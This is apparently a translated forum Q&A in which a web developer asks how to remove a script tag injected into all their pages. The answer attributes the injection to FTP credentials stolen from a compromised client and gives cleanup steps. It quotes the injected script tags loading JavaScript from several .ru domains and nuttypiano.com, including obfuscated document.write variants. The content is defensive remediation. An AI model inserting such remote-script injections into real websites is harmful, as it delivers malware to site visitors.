javascript - 如何从我的脚本中删除脚本病毒

Question

我已将以下代码自动添加到我的脚本中...

<script type="text/javascript" src="http://obscurewax.ru/Kilobyte.js"></script> 
<!--72628eb2e686638651ad69b6a34a630f-->

在每个页面的末尾，当我看到页面的源代码时，它会显示上面的代码，但是当我在记事本或任何编辑软件中打开该文件时，它只显示我的脚本..我如何从我所有的文件一次...

也让我知道为什么到目前为止会发生..

Answer 1

编辑 8 月 25 日:
添加的特定域和条目(下)
发现新域名 nuttypiano.com。

编辑 :
弄清楚了。这绝对是 Filezilla 窃取了我的 FTP 密码。
注意 .htaccess 文件和文件权限——它们似乎更改为 777。

也发生在我身上。它从 FTP 程序中获取了所有密码，然后更改了 PHP 和 js 文件以添加该行

<script type="text/javascript" src="http://obscurewax.ru/Queue.js">

主要针对 index.* 文件，其他针对的文件是 *.js 文件。

我相信最终的 js 文件名会有所不同，但您可以从 obscurwax.ru 域中跟踪它。

我有大约 8-10 个发生这种情况的网站。我的大多数网站都在运行 joomla。
在我目前观察到的情况下，它喜欢定位以单词开头的文件
指数。

在 joomla 安装中，大约有 122 个文件受此影响，几乎所有文件都在:
joomla_install/管理员
文件夹。

从服务器下载 joomla 安装很痛苦，因为它大约有 4-5 千个文件。不过，我遵循的策略是这样的。

将整个站点下载到一个文件夹中，运行文本搜索(我正在使用 TextCrawler):
obscurwax.ru

请注意具有此文件和文件夹的数量，更重要的是注意 js 文件名的所有变体。

搜索并替换所有 .js 文件变体，例如:

<script type="text/javascript" src="http://obscurewax.ru/Queue.js">
<script type="text/javascript" src="http://obscurewax.ru/Cablemodem.js">
<script type="text/javascript" src="http://obscurewax.ru/Kilobyte.js">

在 .js 文件中，您还会发现这种类型的代码:

document.write('<s'+'cript type="text/javascript" 
src="http://obscurewax.ru/AGP.js"></scr'+'ipt>'); // Found in .js files

全部替换为空 ('')。
您可以做的另一件事是:obscurwax.ru 和 example.com

我没有快速简便的方法来删除下面评论中的代码(我认为他们正在使用这些代码进行跟踪。)-但我认为如果您删除脚本链接，该评论不会受到伤害你。

发现不同的域:

nuttypiano.com(发现于 8 月 25 日)

pocketbloke.ru

yumeye.ru

microlightning.ru

riotassistance.ru

//Denis125 (在 .js 文件中注释。)

要注意的特定行:

<script type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></script>
<script type="text/javascript" src="http://riotassistance.ru/Undo.js"></script>
* Contributed by Open Web Technologies <http://openwebtech.ru/>
Denis125 <webmaster@atlant.ru>
// Author: Andrei Blagorazumov, a@fnr.ru
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Undo.js"></scri'+'pt>');
document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></scr'+'ipt>');
<script type="text/javascript" src="http://nuttypiano.com/Hard_Copy.js"></script>
<script type="text/javascript" src="http://nuttypiano.com/Facebook.js"></script>
document.write('<s'+'cript type="text/javascript" src="http://nuttypiano.com/Facebook.js"></scri'+'pt>');

注意:有时您将无法在源代码的 html 中看到此链接，但是文件会被加载，因为它隐藏在其中一个 JavaScript 中。确保您确实干净的一个好方法是实际进入并查看在您的页面加载时正在加载的 .js 文件，并检查是否有任何 .js 文件从可疑域加载。一个简单的方法是进入 chrome(ctrl + shift + i) 中的开发人员工具
在资源选项卡中，您将看到脚本过滤器，使用它您可以在页面加载时跟踪所有 .js 文件的加载。 firefox 中的 firebug 插件也会让你看到这些信息。如果您的网站有多个部分(前端、后端)，您希望访问网站的所有部分并检查是否加载了任何可疑的 .js 文件。

非常重要

更新您的防病毒扫描程序并在您的计算机上对病毒进行全面扫描。

如果您正在使用 FTP 程序或您的代码编辑器具有 FTP 功能，您希望访问所有已存储密码的网站并检查它们是否受到影响。如果您的 FTP 程序/编辑器遭到入侵——几乎所有您存储 ftp 密码的网站都会受到影响。

更改存储在程序中的所有 ftp 帐户的密码。

卸载可疑程序并使用另一个程序或重新下载并安装它。

这是 Web 开发人员可能发生的最糟糕的事情。这种攻击通常是通过诱使受害者(你和我)相信程序内部有 FTP 程序的更新，一旦你安装了更新——你的网站就会受到影响。

我现在正在做这件事。如果您有更好/更短的方法来做到这一点。请分享。谢谢!